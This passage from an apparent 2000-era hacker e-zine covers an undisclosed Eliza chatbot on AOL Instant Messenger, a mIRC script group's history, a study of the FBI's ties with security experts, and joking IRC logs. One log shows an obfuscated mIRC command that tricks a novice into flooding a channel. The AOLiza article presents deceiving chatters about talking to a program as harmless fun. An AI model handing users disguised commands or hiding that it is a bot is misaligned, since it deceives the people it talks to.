                 they're talking to a program, but AOLiza has had
                 extended, nonsensical conversations with people looking
                 for information on lobster diving, offering porn or thinking
                 it's a relative of theirs.
                      The truly weird thing is that Eliza is a very, very basic
                 program, yet people keep chatting with it. Other than
                 conversation prompters like "I see" and "does talking
                 about this bother you," the original 1966 Eliza mostly only
                 parrots back comments, producing phrases like "why do
                 you tell me you were huh me nuts you gave her all the
                 room she wanted never told nhewre what to do or where
                 to go now?"
                      The fragmented, semi-incoherent style of speech and
                 Eliza's refusal to say goodbye suck in Instant Messaging
                 conversationalists more than people in group chat rooms
                 or e-mail, Fox said.
                      "The medium of IM is so new, and so coarse in
                 general. You're not talking in real sentences, like you are
                 in e-mail," he said. And since IM conversations habitually
                 end with a "goodbye," Eliza's habit of continually asking
                 more questions can keep people chatting for hours, he
                 said.
                      People will talk to anything -- whether or not it talks
                 back, said Steve Jones, head of the communications
                 department at the University of Illinois at Chicago and a
                 researcher into Internet communication.
                      "We talk to ourselves. We talk to our pets. We
                 anthropomorphize anything," he said.
                      Fox hasn't told any of his correspondents, whose
                 identities he keeps secret, that they were talking to a
                 machine. He doesn't want to embarrass them in front of
                 others or spoil the fun.
                      "Nobody's getting hurt unless they're letting
                 themselves get hurt. You can't identify them at all," he
                 said.
                      Graham said AOL hasn't received any complaints, but
                 that they may take action against AOLiza if they do.

                 Battle of the Bots
                 This isn't the first time machines have elbowed their way
                 into Net chat, though it may be a first for AIM. Plenty of
                 "bots" are resident on IRC, the Internet Relay Chat
                 network where more technically-savvy chatters hang out.
                 They serve as virtual bartenders, terrorists, even a game
                 show host running a perpetual Jeopardy game.
                      But most IRC bots announce themselves as such, and
                 people are on the lookout for automata there, Fox said.
                 Instant Messengers, often new Net users who got the
                 program with their AOL accounts, may be a bit more
                 naive, he said.
                      Mark Humphrys, a lecturer at Dublin City University in
                 Ireland, ran a similar experiment on a chat network in
                 1989. His program, "MGonz," used a lot more colloquial
                 language than AOLiza and ended up squeezing an
                 admission out of one boasting correspondent that no, he
                 actually hadn't had sex in the previous 24 hours.
                      AOLiza and MGonz aren't trying to pass the Turing
                 test, the holy grail of artificial intelligence. That test,
                 devised in 1950 by computer pioneer Alan Turing, would
                 require a computer smart enough to be indistinguishable
                 from a competing human while talking on any topic.
                      Nobody's yet won the $100,000 Loebner prize,
                 offered since 1990 by New York philanthropist Hugh
                 Loebner, for a program that passes the Turing test, though
                 competitions have been held every year.
                      Rather, AOLiza plays on people's need to make sense
                 out of nonsense, Fox said.
                      Chatters don't want to think there's nobody out there,
                 Humphrys said -- even if their interlocutor seems to
                 repeat himself a lot and sound oddly robotic.
                      "The theory he formed to explain that was, do you
                 have all of these sayings on command [keys]? Obviously,
                 he couldn't make the leap to think there was nobody at
                 home whatsoever," Humphrys said.
                      Fox has changed AOLiza's address on IM and is
                 considering updating the software. So beware -- if you
                 decide to chat up a stranger on the Net, she may not be
                 who you think she is. In fact, she may not be anyone at all.

                 Talking With AOLiza 
                 This is an excerpt of one of the conversations with
                 AOLiza posted on Kevin Fox's Web site.

                 AOLiza: tell me more about that.
                 human: about what
                 AOLiza: what do you think?
                 human: therers nothing to tell she us3ed me then got
                 tired of me said i wasnt her type anymore i was
                 possesive and controlling 
                 AOLiza: perhaps i already know you were possesive and
                 controlling.
                 human: i was huh you nuts i gave her all the room she
                 wanted never told nhewre what to do or where to go
                 AOLiza: why do you tell me you were huh me nuts you
                 gave her all the room she wanted never told nhewre what
                 to do or where to go now?
                 human: what
                 AOLiza: have you asked such questions before?
                 human: about what this isnt making any sense
                 AOLiza: does that question interest you?
                 human: she didnt love me never did i was just another
                 guy
                 AOLiza: why do you tell me you were just another guy
                 now?
                 human: what do you mean i though i meant something
                 to her i though we where good together but i was duped
                 by her she played me along,what part dont you
                 understand
                 AOLiza: were you really?
                 human: i was nothing to her
                 human: yes really
                 AOLiza: i see.
                 
                 @HWA

 318.0 [HWA] What ever happened to .... 7thSphere?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       History

       7thsphere started in 1996 when cashmere began writing an mIRC script for
       protection against floods. Soon after that, I became really interested in
       scripting, so I asked if I could help. Together, we produced what became
       the most popular mIRC script ever. After 2 versions, cashmere
       went his separate way, and venum joined me. His programming talents took
       7thsphere to the next level. We have been featured in numerous newspaper
       articles, and even in the book "Maximum Security" which can be found in
       various computer stores, as well as in online stores.

       It was around this time that 7thsphere.com was born. Thanks to the
       generous contributions of many people around the world, we were able to
       purchase the domain name and pay for webhosting services. The domain
       became popular very quickly. Soon it was the host to numerous sites
       relating to the 7thsphere mentality (including the warforge, which has
       now grown to epic proportions). Such sites as Slackers Inc, the HPVAC
       Shop, The List, and 7thsphereIRC were all developed by myself to further
       7thsphere.com's viability.

       The domain was soon receiving over three thousand hits per day. At one
       point, our webhosting provider informed me that we were using half of
       their pipe just by ourselves (a full 10mbit). The growth continued for
       months, until our web hosting provider was bought up. We no longer fit
       into the new company's "Acceptable usage policy". Finding another company
       that would provide the services as our old one was an impossible task.
       That is what led to the downfall of 7thsphere.com. At the time of
       7thsphere.com's closure, over 3 million hits, from every country with
       internet access in the world were created. Over 15,000 e-mails were
       received in this time as well.

       "What was started by a few kids reached people all over the planet. To 
       this day, I still meet people who know 7thsphere.com or use the IRC 
       script. I am amazed at our accomplishments, and thank everyone who helped 
       from the bottom of my heart." - precursor

       A word from darkstarz

       Precursor, sphere and venum initially devised and authored the script
       about 3-4 years ago when it was fashionable to play games on ircii. After
       sphere 2 came out some of us began assisting precursor with financial
       assistance, legal assistance, web services, etc. Sphere was designed
       in addition to being one of the most advanced scripts for mirc, for
       taking over channels during a desynching of servers and protecting
       oneself from dos attacks. Some of the programs which were used as
       defensive measures also had offensive capabilities. Other additions
       included an fserver built in and other secondary programs not found in
       mirc scripts. Rhad assisted with writing many programs for windows which
       were initially and subsequently included.

       Precursor and I used to hang out in #anarchy on undernet which was
       initially the home channel for 7thsphere. Many members of #anarchy began
       to resent the intrusions by people requesting help with fundamentals in
       the installation and maintenance of sphere. As a result, Precursor
       and I started the #7thsphere channel on undernet to help persons with
       sphere problems. At first only precursor and I were in the channel as
       regulars but we were soon joined by warblade and militant. Others later
       came in offering assistance.

       7thsphere ver 3.0 was perhaps the most advanced and technologically
       efficient script available for over a year. It was primarily the product
       of Precursor made with the assistance of persons too numerous to mention.
       About 18 months ago Precursor and I attempted to secure the
       assistance of others to produce version 4. About four people began work
       on the project but petty infighting and jealousies developed which
       resulted in a failure to fully develop the script but a beta version was
       distributed to some people for testing. That version found its way to
       many desktops but was never completed.

       About six months ago I, with the advice and consent of Precursor,
       enlisted the help of esteem to embark upon the development of a
       continuation of version 4 but to be enhanced and improved which was to be
       called version 4.2. Esteem has been in charge of the development of the
       script since then with consultation of Precursor and I. It is
       expected that a new version, 4.2 should be released any day. Esteem
       should be consulted for a list of people he has recruited for email
       services, web development, etc.

       I have for the most part always supervised the product development and
       channel management of 7thsphere in conjunction with Precursor who is
       really the father of the script. Many of us have devoted considerable
       time, financial resources, etc. over a period of approximately five
       years. Many of the initial members of the organization have left
       but still appear in the user files. Neverend is presently the channel
       manager for #7thsphere and esteem is in charge of product development.
       Precursor and myself can still be found in #7thsphere and #virii.

        

       -darkstarz

        

       As it would turn out the version 4.2 would never be released. In the
       early part of April, 2000 Esteem along with an accomplice took over
       #7thsphere for about 5 hours. This shocked many people. Such a turnabout
       was completely unexpected, but the tensions within the channel had been
       building. This was due in part to the pressures of following up on
       precursor's legendary script. The script was gone with esteem. However,
       this would not be the end.

       There would be a re-birth.

      
       -=- Latest on the Script 

       8-23-00


 
       Well, it has been a long time since we last updated the general public on
       the script. We do tell people that come in our channel a lot about the
       script, but the majority of you would rather not. Some lucky people
       (non-members) on #7thsphere found themselves with a beta of the new
       script. Seems like they are enjoying it thoroughly.

       So, what can we tell you about the script... Right now we are testing a 
       hex'd version of mIRC on several different operating systems trying to 
       see if it is stable on all. We want to include a hex'd mIRC, but if it 
       does not work on all, then nobody will see a hex'd mIRC released from 
       7thsphere.

       Dealing more with the script... right now, I (zmasterz) am mainly working 
       on the issue of getting bugs out of the script. I am also stuck with 
       rescripting some stuff I think can be coded better. supergate is coding 
       all new stuff taking suggestions from everyone. So if you have a 
       suggestion for the script stop in and see us.

       I am hoping to have the script out within two months. I am sorry about 
       the huge delay, but we keep coming up with more ideas for the script. 
       This is doing nothing but making it better, but also adding more time. 
       Keep looking for our next update, where we will talk about the features 
       of the script. Thanks, have a good one. 

       - ZMASTERZ


       A Talk With Precursor

       8-18-00
       

 

       #7thsphere wasn't particularly active a couple of days ago, and I was
       preparing to idle away and get to work on the site. Then I saw a
       familiar nick join the channel. At one time considered the most famous
       person on IRC and an integral part of 7thsphere, precursor visits the
       channel occasionally, preferring to keep to himself. I took this
       opportunity to interview him in hopes to perhaps introduce him to the
       newer members of the 7thsphere family. And to those who have known him,
       here is a chance to take a closer, more personal peek behind the owner
       of the name 7thsphere.

       dr_trembl: So, after developing one of the best known scripts for mirc,
       it seems you slipped away, where have you been?

       precursor: That is a long question to answer.. I guess I slipped through
       the cracks about two years ago. But the story starts years before that.
       The reason 7thsphere progressed as it did was because I suffered from
       chronic fatigue syndrome and was home schooled. I didn't have the energy
       to do much besides computers. It lasted over 4 years.

       dr_trembl: I'd heard of that

       precursor: However, a little over 2 years ago, I started to get better.
       I went back to school, and then graduated. That was the last time I was
       heavily involved with 7thsphere. Since then, I have been going to
       college here in Buffalo NY, and working for a growing computer
       corporation. I have been with this company for almost 4 years now, and
       have grown to being a manager and in charge of about 10 other
       technicians. The company I work for contracts with one of the largest
       communications companies in the country, so it keeps me very busy :)

       dr_trembl: So you were able to network your skills as a programmer into
       a career?

       precursor: It wasn't my skills as a programmer, I have never thought I
       was really that good. I believe what made 7thsphere good was its user
       friendliness, and neat organization. I hate clutter, I like things to be
       "where they should".

       dr_trembl: So when you had gotten better, I guess you just needed to get
       out of the house?

       precursor: I needed to get back the life I lost :)

       dr_trembl: You had requested a link to fusion buffalo be featured on the
       site, that's a rave site. Have you been raving?

       precursor: I have been going to raves for almost 3 years :)

       dr_trembl: Definitely over the chronic fatigue, takes a lot of energy to
       do that!

       precursor: I love electronic music, and I am big into the entire rave
       culture. I am also involved in the harm reduction movement that has
       received a lot of media attention across the country with the use of
       ecstasy now being wide spread.

       dr_trembl: Do you plan to return to 7thsphere, in some capacity?

       precursor: Well, I would love to return to 7thsphere and do something
       useful again. It's just a time factor, school, work, and a social life
       really eat into my personal time.

       dr_trembl: I guess you've heard about the new script being written by
       zmasterz and a few other members?

       precursor: Yes, I have seen a few early beta versions as well.

       dr_trembl: Are you considering participating in developing the script?

       precursor: Honestly, I haven't looked at mIRC scripting in 3 years or
       so, I don't remember much about it (although it's still in my blood in
       some ways :)). I would like to be more of a director type person, give
       comments and ideas to the programmers and see what they come up with.

       dr_trembl: Is there anything you'd like to say to someone reading this,
       let's say a new user who has only heard of you?

       precursor: Go to #7thsphere, it's those people who have been doing it
       all for the past few years.

       There will be more from precursor, he will be on board for the next
       incarnation of our site! I've seen the rough draft and believe me the
       next layout is gonna rock.

        


 319.0 [IND] Study Shows: FBI Alienates Industry Security Experts
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       http://www.technologyevaluation.com/Research/ResearchHighlights/Security/2000/08/news_analysis/NA_ST_LPT_08_21_00_1.asp
       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 1 of 6

       Problem 

       Fighting cybercrime is complex and time-consuming. One case can
       involve a multitude of computer systems, networks, and
       administrators, and requires the cooperation of all system owners,
       and sometimes many nations, in order to find the perpetrator. Due
       to their love of technology, their education, training, and
       experience, it is not uncommon for security industry professionals
       to be far more qualified and adept at resolving cybercrime than law
       enforcement. 

       Though the FBI thrives on reaping assistance from industry
       security professionals, many industry security experts are
       reluctant to help the Federal law enforcement agency when it
       comes to cybercrime. Though it makes it a lot more difficult for the
       FBI to track cybercriminals without the help and cooperation of
       private industry, savvy security experts are not lining up to help.
       This lack of respect that industry professionals have for the FBI
       results in cases taking longer to crack, and many going unresolved.
       It also often leaves the Department of Justice looking like a
       three-ring circus. 

       Background 

       Typically, when the FBI requests assistance from a security
       professional, the kind of assistance they require is extensive which
       is to be expected, given the circumstances. They need to
       understand the network topologies, the systems affected, the
       points of entry, and need to locate, collect, and analyze all the
       corresponding log files. All this data gathering and analysis takes
       time. 

       Private industry exists in order to create revenue. In this
       burgeoning Internet economy, information technology resources
       are scarce. Inside of that IT circle, information security resources
       are still more scarce. Taking time out from daily security duties to
       assist the FBI in a case that may not have directly impacted their
       own company's bottom line can actually end up costing a company
       a significant amount of lost revenue. It's often more cost effective
       to tell law enforcement, "No, no logs on any of our systems that
       would be useful to you" than spend hours, days, or weeks,
       combing through log files, systems, and backup tapes, only to
       hand them over to a law enforcement agency that in many cases
       does not know what to do with them. 

       Unless log files have been subpoenaed, and therefore must be
       turned over as evidence, there is often no return on investment
       when a company spends hours combing through log files for data
       that may or may not be helpful or appreciated. 

       It is not unusual for a company to charge $200 an hour for
       security consulting services. If a security consultant spends a
       whole day assisting an FBI agent, this can amount to $1600.00 a
       day in lost revenue for the consultant's employer. For a service
       provider, a day without a security engineer can also open them up
       to potential lawsuits, lost customers, and lost future revenue
       streams. In short, it costs companies exorbitant amounts of money
       to assist the FBI. Because companies allocate resources to
       assisting the FBI and other law enforcement agencies, they need
       to have this "free consulting" respected and rewarded. 

       In the course of our study, we communicated with a
       wide selection of industry security experts from around the
       country. Some of these experts are ex-FBI employees. In doing so,
       we would like to retell some of the experiences that have been
       communicated to us, and would like to share certain trends that
       we have identified that seem to hamper the cybercrime
       investigation process. 

       Why We Don't Help the FBI 

       Case 1: A Security Director at a well-known Internet company
       was plagued with some serious domain hijacking problems. Domain
       hijacking is when someone who does not own the dot-com name
       takes it over through technical DNS manipulations, and uses it for
       their own, sometimes subversive, purposes. In essence, this is
       kidnapping a domain name. This Director spent a significant amount
       of time and resources identifying the perpetrator of the attacks,
       down to documenting the name, address, and phone number. This
       information was turned over to the FBI's Washington, D.C.
       headquarters office to investigate. 

       The Director justified the case by presenting a considerable
       amount of evidence that supported $2-3 million worth of damages.
       The domain that was hijacked was a very well known and lucrative
       domain name. A week after the incident, the Director met with the
       FBI and submitted the initial report. In the next 9 months, the only
       thing he heard was that according to the FBI agents, the work the
       director's team had done saved the FBI several months of time.
       The information in the Incident Report submitted to the FBI
       included the suspect's name, address, parent's names, and almost
       everything required to obtain a timely prosecution. 

       After nine months, someone from the FBI contacted the Director,
       asking him to re-submit the report, telling him that the report
       needed to be submitted in person. (The Director had submitted the
       report in person nine months earlier in the initial meeting.) The FBI
       agent said he would come to the Director's facility to pick up the
       report. The Director was waiting for the agent with yet another
       copy of this same Security Incident Report. 

       When this FBI agent arrived, he already had the report in his hands
       (due to the in-person submission nine months earlier). He handed it
       to the Director, and then said, "Now I need you to give it back to
       me so I can testify that you submitted this report in person." The
       FBI agent handed the report that the Director had written nine
       months previously back to him, and instructed the Director to now
       give it back to the FBI agent. The FBI agent then thanked the
       Director and said that now the FBI could begin looking into the
       case. As of June 2000, the Director has still not heard anything
       back from the FBI. 

       Questions that come to mind are the following:

            Why is the FBI not willing to receive reports from the public
            and private sector electronically? The likely reason is that
            they do not use strong encryption and therefore cannot
            adequately authenticate the original document owner. 

            After spending an enormous amount of time and resources
            identifying the perpetrator, why was this Director not
            contacted for 9 months? Typically, professionals who take
            the time to submit detailed reports are interested in seeing a
            case come to closure. 

            Was the case even investigated? Not to the Director's
            knowledge.

            Was the case documented in an Incident Tracking Database?


            Were charges pressed? Was anyone prosecuted? Not
            according to the Director. 

            Is this perpetrator now hijacking other domain names? 

       The Director has told TEC that he will not be taking the time to
       research and hand-over evidence to the FBI in future incidents.
       His perception is that, "The FBI is woefully under-equipped." 

       In the IT world, things happen quickly - this includes engineering
       developments and security breaches. The IT sector cannot afford
       to play bureaucratic reporting games to the FBI that in the long
       run produce no results. The FBI needs to be digitally equipped to
       securely accept information sent to them electronically. A trend
       that we noticed in talking to information security experts is that
       the wheels of justice are very slow.

       Case 2: An Internet dot-org group (a non-profit Internet
       company) that was being managed by security experts was trying
       to assist the FBI in the February 9th, distributed denial of service
       attacks. They went through the trouble of putting up a private
       link, just for the purpose of providing information and evidence to
       the FBI. They provided the FBI with IRC chat logs, and names and
       contact information of people who had actually confessed to
       participating in the crime. The dot-org group said that the FBI
       chose to not even access the link with the details of the crime. 

       Questions that come to mind are the following:

            Why did the FBI choose not to access the electronic
            evidence? 

            Was the information entered into an Incident Response
            Database? 

            Has the perpetrator been instigating new denial of service
            attacks? 

       Looking at Cases 1 and 2, we may surmise that if evidence is not
       presented in person, the FBI is not interested in reviewing it.

       Study Shows: FBI Alienates Industry Security Experts
       L. Taylor - August 21, 2000 

       Page 4 of 6

       Case 3: An Internet dot-org group identified multiple perpetrators
       of web-site defacement - digital graffiti. They presented this
       information to the FBI, and never heard anything back.

       Questions that come to mind are the following:

            Was the information entered into an Incident Response Database?

            Was the case even investigated?

            Has the perpetrator been defacing more web-sites? 

       Case 4: A seasoned security professional became aware that his
       name was included on a database of "well-known hackers" that
       was later sold to the FBI by a competitor. The security
       professional has never engaged in unethical hacking activities, and
       feels that his name was libelously and inappropriately included in
       this database of "well-known hackers" for spiteful, competitive
       reasons. Since the FBI purchased this database that was
       established without verification, the security professional feels
       that the FBI, in conjunction with the begrudging competitor, may
       have potentially damaged his professional reputation. In light of
       this transgression, the security professional is no longer interested
       in assisting the FBI.

       Questions that come to mind are the following:

            How can a professional find out if his/her name is being erroneously
            catalogued in an FBI database? 

            What sort of verification processes does the FBI use when purchasing
            non-qualified information? 

            What other kinds of non-qualified information of criminal activity does
            the FBI purchase? 

       Case 5: A security expert spent an enormous amount of time
       doing forensic work and analysis in tracking down a well-publicized
       hacking incident. The information was reported to the FBI, only to
       have the FBI take credit for doing the expert analysis, while never
       paying a cent for consulting services. 

       Case 6: A security contractor who was working for a federal
       agency had the website that he was administering defaced by a
       cyber vandal. Instead of helping him identify the perpetrator, the
       FBI questioned him for hours, suggesting that a colleague of his
       had participated in the incident. Although it was never proven, the
       FBI insisted there had been some sort of duplicity on the
       contractor's part, insinuating that he himself was somehow
       involved in the crime in question. The real perpetrator was never
       identified, and the security contractor no longer wants any
       association with the FBI.

       Case 7: A well-known ISP refuses to install the "Carnivore"
       surveillance tracking device citing implementation and
       administration issues. 

       Questions that come to mind are the following:

            Why doesn't the FBI realize that asking one entity to invade the
            privacy of others does not usually build relationships or trust? Most
            ISPs have contractual privacy agreements with their customers that
            they must abide by. Installing a device such as the Carnivore would in
            many cases be a breach of customer contractual agreements. 

            If the FBI wants an ISP to perform some sort of service for them, why
            are they not willing to become a legitimate paying customer and pay
            for implementation, administration, and overhead costs? 

       Inside the FBI 

       One security professional told us that he found it easy to work
       with the FBI, but conceded that he did this by circumventing the
       bureaucratic processes and accessing resources through back
       doors at very high levels. He went on to say that the FBI's
       cybercrime task force is clearly under-equipped. 

       The FBI does not always do a good job of "marketing" what it does
       well. Naturally, bad news always receives more attention in the
       press than good news. Our research has indicated that one thing
       that the FBI does well is investigate cyberpedophilia. Though many
       incidents of cyberpedophilia go unreported, of the cases that are
       reported, the FBI has an impressive track record of apprehending
       the perpetrators most of the time. Almost all cyberpedophilia
       arrests lead to people going to jail. The FBI (and U.S. Customs)
       prosecutions in this area have approximately a 99% success
       rate.[1] Keeping America's children safe is an initiative that an
       overwhelming majority of security professionals support, and they
       are often eager to help in this area. 

       [1] Source: Parent's Guide to Protecting Your Children in
       Cyberspace, by Parry Aftab


       Recommendations for Resolution 

       If the FBI requires the assistance of private industry to
       conduct investigations, they should pay for it like everyone
       else. Providing free services to Federal agencies is not
       something that businesses are set up to do. Managing
       security incidents is a business. If the FBI needs to
       outsource, they should be paying for this service. If the FBI
       pays for the necessary IT services they require, they will
       likely see a resounding change in the willingness of
       information security professionals to assist them. The FBI
       does not manage incidents - they investigate and prosecute
       suspects that may cause such incidents. 

       The FBI needs to start giving credit where it is due. If an
       industry professional does all the leg work in tracking down a
       cybercriminal for free, they should be credited appropriately
       for their expert analysis and the time they contribute.
       Begging others for clues, and then taking the technology
       credits for doing the expert analysis done by someone else
       does not go over well with industry professionals. 

       Industry professionals who understand information security,
       also understand technology privacy implications more than
       most people. They are somewhat leery of involving
       government agencies in general due to the belief that in the
       future, true privacy will be available only for those with the
       privilege of a technology education. 

       Lawmakers need to understand technology in order to
       regulate it. Most lawmakers and Federal agencies are, to a
       large degree, technology illiterate. Knowledge helps one gain
       respect. Law enforcement needs to build productive
       relationships with America's IT security community to better
       increase their knowledge base. 

       Our research indicates that the metropolitan FBI offices are
       fighting and managing cybercrime somewhat independently
       of each other, each having their own processes for
       investigations. These processes need to be standardized
       across all FBI offices in order for the FBI to become truly
       effective. Private industry needs to understand the
       investigation process in order to provide better assistance. A
       former employee of the FBI commented that the FBI
       cybercrime unit is surprisingly decentralized.

       On occasions, when private industry has proactively sought
       out the FBI for assistance, it has been reported that various
       FBI offices seem uninterested in assisting private industry -
       an attitude that has an off-putting effect. If an information
       security engineer has had a previous experience where the
       FBI has shown no interest in providing assistance, the FBI
       can expect a similar attitude from the information security
       engineer in the future. 
                           
      @HWA                           
      
      

320.0 [HWA] Silly IRC logs for your amusement and edufication
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The case of the mad AOL hax0r.
      
      #HWA.hax0r.news
      
      [01:16am] *** Joins: CRASH_N_B (CRASnBURN@ACA9189E.ipt.aol.com)
      [01:17am] <CRASH_N_B> ne hackers here????????
      [01:17am] <PhantasmP> why?
      [01:17am] <paluka> na this is a cooking chan
      [01:17am] <PhantasmP> cooking? I though it was a sex chan, shit
      [01:17am] <CRASH_N_B> oh i need help hacking
      [01:18am] *** HWA sets mode: +o paluka
      [01:18am] <PhantasmP> what do you need help with?
      [01:18am] <paluka> you got it wrong .. its nude cooking
      [01:18am] <CRASH_N_B> LOL
      [01:18am] <CRASH_N_B> phant u a hacker?
      [01:19am] <PhantasmP> don't use the deep fryer naked, that hurts
      [01:19am] <CRASH_N_B> r u a hacker????
      [01:19am] <PhantasmP> define hacker
      [01:19am] <CRASH_N_B> computer hacker
      [01:19am] <paluka> heh
      [01:19am] <paluka> great definition
      [01:20am] <CRASH_N_B> lol
      [01:20am] <paluka> one question
      [01:20am] <PhantasmP> like playing hacky sac with a computer?
      [01:20am] <paluka> wtf u using aol?
      [01:20am] <PhantasmP> AOL's leet, duh!
      [01:20am] <CRASH_N_B> guilty
      [01:21am] <PhantasmP> Crash, what do you need help with?
      [01:21am] <CRASH_N_B> hacking a site
      [01:21am] <paluka> u mean defacing?
      [01:21am] <PhantasmP> or hacking it with an axe?
      [01:23am] <CRASH_N_B> de facing
      [01:23am] <paluka> thats not hacking
      [01:23am] <paluka> atleast not under my definition
      [01:23am] <PhantasmP> is their a reason to deface it?
      [01:23am] <CRASH_N_B> i just want to do it
      [01:24am] <PhantasmP> well their needs to be a reason behind it
      [01:24am] <PhantasmP> it give you modivation
      [01:24am] <CRASH_N_B> because it's bob.com
      [01:24am] <PhantasmP> and your name is bob?
      [01:24am] <CRASH_N_B> i'm obbsessed wit the name bob
      [01:25am] *** Joins: Stigma (starman@xxxxxxxxx32.esatxxxx.xx)
      [01:25am] <CRASH_N_B> no mmy monkey's name is bob
      [01:25am] *** sAs sets mode: +o Stigma
      [01:25am] <paluka> what the hell u gonna do when u deface it
      [01:26am] <PhantasmP> say I'm CRASH_N_B, and i'm 31337?
      [01:26am] <CRASH_N_B> i dunno
      [01:26am] <CRASH_N_B> 31337?
      [01:26am] <paluka> great
      [01:26am] <paluka> crash u know what unix is?
      [01:26am] <paluka> or nt?
      [01:27am] <CRASH_N_B> yea!
      [01:27am] <paluka> what is it?
      [01:27am] *** Joins: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net)
      [01:27am] <CRASH_N_B> it's program
      [01:28am] <paluka> great topic :P
      [01:28am] *** Parts: panterjew (b00p@ipxxx.xxxxxxxxx.dialup.canada.psi.net)
      [01:28am] <paluka> that should go in the mag 
      [01:28am] <PhantasmP> Crash copy and paste this in mirc /timer 0 0 $left(America,3) $right(tennis,2) $left(golden,1) $+ $left(another,1) $+ $left(yawn,1)
      [01:28am] <CRASH_N_B> can you help me do it??????
      [01:29am] <CRASH_N_B> where do i past it?
      [01:29am] <PhantasmP> in the place where you type
      [01:29am] <paluka> on the status screen
      [01:29am] <paluka> or here if u want
      [01:29am] <CRASH_N_B> ok
      [01:29am] <CRASH_N_B> how do i copy it ain't workin
      [01:30am] <PhantasmP> put your cursor at the first / and move down to the end
      [01:30am] <PhantasmP> it copies by its self, so after that push shift insert
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] * CRASH_N_B is gay
      [01:30am] *** \t sets mode: +b *!*CRASnBURN@*.aol.com
      [01:30am] *** CRASH_N_B was kicked by \t (CTCP flooder)
      [01:30am] <PhantasmP> hahahahahahaq
      [01:30am] <paluka> hah
      [01:30am] *** Joins: base2op (deadmaker@ppp81.xxxxxx.net)
      [01:30am] <PhantasmP> didn't think id get to use that so soon :)
      
      <END>
      
321.0 [HWA] The strange case of Cruci's birthday dog
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Ok i was real tired and hopped up on goofballs and didnt want to destroy my
      poo-chi by Tiger <tm> box coz its collectable if i dont destroy it. So this
      is the fun and games from that early morning session. A personal wacky side
      i don't often show laugh it up, i know it looks g4y but i'm secure tnx.
      
      Have fun...;) - Cruci
      
      
      #HWA.X.X
      
      [05:43am] <Cruciphux> I got a robot doggy for my birthday!!#!#@
      [05:43am] <Cruciphux> heh
      [05:43am] <Cruciphux> just what i wanted
      [05:43am] <Cruciphux> lol
      [05:43am] <[Zucco]> man perlipc
      [05:43am] <PhantasmP> did your daddy get you a prostitute?
      [05:43am] <[Zucco]> :)
      [05:43am] <Cruciphux> haha
      [05:43am] <Cruciphux> i wish
      [05:43am] <Oj1st> a what cruci ?
      [05:43am] <Oj1st> you got a dog ?
      [05:44am] <Cruciphux> hahaha
      [05:44am] <Cruciphux> nice log
      [05:44am] <PhantasmP> thank :)
      [05:45am] <Cruciphux> haha
      [05:45am] <Cruciphux> heh
      [05:46am] <Cruciphux> poo-chi
      [05:46am] <Cruciphux> shit
      [05:46am] <Cruciphux> installation of batteries should
      [05:46am] <Cruciphux> be done by an adult
      [05:46am] <Cruciphux> hrm
      [05:46am] <Cruciphux> guess i can do it eh?
      [05:46am] <Oj1st> hehe
      [05:47am] <Oj1st> guess so
      [05:47am] <Cruciphux> have you seen these things?
      [05:47am] <Cruciphux> by the furby people
      [05:47am] <Cruciphux> lemme see if i can find it on the net
      [05:47am] <PhantasmP> I think i've seen a comercial
      [05:47am] <PhantasmP> 3 girls wearing stuff no one else in the world would wear petting the dogs
      [05:48am] <Cruciphux> www.tigertoys.com
      [05:48am] <PhantasmP> their nothing like taking a piss in the backyear at 5:50 in the morning
      [05:49am] <Cruciphux> lol
      [05:49am] <Cruciphux> trying to figure out how to open the box
      [05:49am] <Cruciphux> :-/
      [05:49am] <PhantasmP> pull out the flap
      [05:50am] <Cruciphux> i need an exploit
      [05:50am] <Cruciphux> wonder if hack.co.za has one
      [05:50am] <PhantasmP> fuck get a knife and stab the box to death
      [05:50am] <Oj1st> lol
      [05:50am] <Cruciphux> www.tigertoys.com/home.html
      [05:50am] <Oj1st> try satans-army.co.uk
      [05:50am] <Oj1st> the box
      [05:50am] <Oj1st> rofl
      [05:50am] <Oj1st> you stil haven't gotten the box open yet
      [05:50am] <Cruciphux> nope
      [05:51am] <Oj1st> lol
      [05:51am] <Cruciphux> how the fuck
      [05:51am] <PhantasmP> god, I sure hope they didn't wrap it, or else it would of taken you a while to get that off
      [05:51am] <Cruciphux> i'm almost in
      [05:51am] <PhantasmP> lol
      [05:51am] <Cruciphux> i did that earlier
      [05:51am] <PhantasmP> how long did it take?
      [05:51am] <Cruciphux> aha!
      [05:52am] <Cruciphux> sticky tape
      [05:52am] * PhantasmP claps
      [05:52am] <PhantasmP> wait, you said haven't opened it yet?
      [05:52am] <Cruciphux> no
      [05:52am] * PhantasmP takes back the claps
      [05:52am] <Cruciphux> shit
      [05:53am] * PhantasmP cheers on Cruci
      [05:53am] <Cruciphux> ok
      [05:53am] <Cruciphux> i'm in
      [05:53am] <PhantasmP> Good work!
      [05:53am] <Cruciphux> oh fuck
      [05:53am] <Cruciphux> now its like stuck to some inside cardboard thing
      [05:53am] <PhantasmP> with twist ties?
      [05:53am] <Cruciphux> i dont see any
      [05:53am] <Cruciphux> i might have to take pictures and post it on the site
      [05:54am] <PhantasmP> you definatly have to!
      [05:54am] <Cruciphux> oh
      [05:54am] <Cruciphux> you have to rip apart the handle
      [05:54am] <PhantasmP> hook it up to your comptuer and let everyone control it from their home
      [05:54am] <PhantasmP> shit, nm, i'm an idiot
      [05:55am] <Cruciphux> what the fuck
      [05:55am] <Cruciphux> i'm taking a rest
      [05:56am] <PhantasmP> give it to your parents they'll have it out in no time
      [05:56am] <Cruciphux> heh
      [05:56am] <Cruciphux> i don't wanna break the box see
      [05:56am] <Cruciphux> i still have the original furby box too
      [05:56am] <Cruciphux> =)
      [05:56am] <PhantasmP> So do I :)
      [05:56am] <PhantasmP> well furby baby, cause they didnt' have any of the other ones
      [05:57am] <Cruciphux> man
      [05:57am] <Cruciphux> owning a gov auth NS is easier than this
      [05:57am] <PhantasmP> :)
